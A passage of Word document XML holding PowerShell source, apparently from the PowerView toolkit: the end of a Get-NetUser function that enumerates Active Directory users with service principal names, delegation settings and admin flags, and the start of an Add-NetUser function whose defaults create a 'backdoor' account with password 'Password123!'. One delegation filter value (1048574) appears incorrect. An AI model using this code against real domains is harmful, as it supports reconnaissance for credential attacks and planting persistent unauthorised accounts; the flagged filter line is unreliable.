    <w:p w14:paraId="073F0E87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191CF6E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="07380B88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1F0234" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1CA4354C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D651F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B3D3F29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ACED20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1011A750" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="104C74DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602C2317" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="184B1D46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetUser -Domain testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AEB9D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E1BEB16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60166223" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55BFCCED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetUser -ADSpath "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2595BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEE2DE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2262EFC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48945884" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E148987" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED0E7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45516A10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F5EB882" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD9451E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3D6D55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18984321" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2453F606" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4411FE06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="014B0EB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3780307D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD0F31E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A0BA4AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB99ECD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Filter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0DCE0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BA6AFAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AE495A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SPN,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40E2CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D49BBE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BA2FD5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $AdminCount,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C9F0F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B2D4357" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327D28C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Unconstrained,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0691979C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A71FC30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E47FFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $AllowDelegation,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560E58AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F6D1A9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A338EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCBBCFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021DBDB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A037809" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0220BC5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE69353" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AEADB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C4A6EA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E834F7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # so this isn't repeated if users are passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8D3406" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserSearcher = Get-DomainSearcher -Domain $Domain -ADSpath $ADSpath -DomainController $DomainController -PageSize $PageSize -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1173EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A98B883" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7FEB77FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07673587" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($UserSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D1F09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="641C6F70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're checking for unconstrained delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC0D5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Unconstrained) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C92497" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Checking for unconstrained delegation"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8D881B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=524288)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AB1FB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EC9A41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($AllowDelegation) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E6834E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Checking for users who can be delegated"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A48436B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # negation of "Accounts that are sensitive and not trusted for delegation"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514F31EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663ADA3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD33624" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($AdminCount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D0F712" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Checking for adminCount=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A327E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Filter += "(admincount=1)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583EDC3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E937AF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7AE0D354" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # check if we're using a username filter or not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1844EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($UserName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2418812D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # samAccountType=805306368 indicates user objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B206FB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $UserSearcher.filter="(&amp;(samAccountType=805306368)(samAccountName=$UserName)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066AAD8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4590CD8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($SPN) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2A26BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $UserSearcher.filter="(&amp;(samAccountType=805306368)(servicePrincipalName=*)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1CE0F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE9E46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3AAEBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # filter is something like "(samAccountName=*blah*)" if specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384E2AD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $UserSearcher.filter="(&amp;(samAccountType=805306368)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CDDA43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593B0E9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="49AC6172" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results = $UserSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75232608" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6076F604" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # convert/process the LDAP fields for each result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC8F40F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User = Convert-LDAPProperty -Properties $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E47BFEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User.PSObject.TypeNames.Add('PowerView.User')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719A2D07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BE4826" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E2B525" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4C1007" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $UserSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FB03E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE8E9E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B612EC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4CAAF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A478665" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64FBA12A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Add-NetUser {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2462A53F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776A2552" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E26A6E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BDE16AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Adds a domain user or a local user to the current (or remote) machine,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4218E97A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if permissions allow, utilizing the WinNT service provider and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C1C642" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        DirectoryServices.AccountManagement, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DFC31F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074D3A62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The default behavior is to add a user to the local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C564F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        An optional group name to add the user to can be specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BF4DBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="51164F15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE4C965" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="670F0FB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The username to add. If not given, it defaults to 'backdoor'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D9D7A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B3255FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2519B995" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="66F14778" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The password to set for the added user. If not given, it defaults to 'Password123!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FA53A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="77828BB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6636F007" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64A322D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Group to optionally add the user to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617BA9CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="602E23AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651B3D2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6106A9F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Hostname to add the local user to, defaults to 'localhost'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B30833" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A4E7176" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6362AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="45CD8A7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Specified domain to add the user to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79470984" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="354515EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
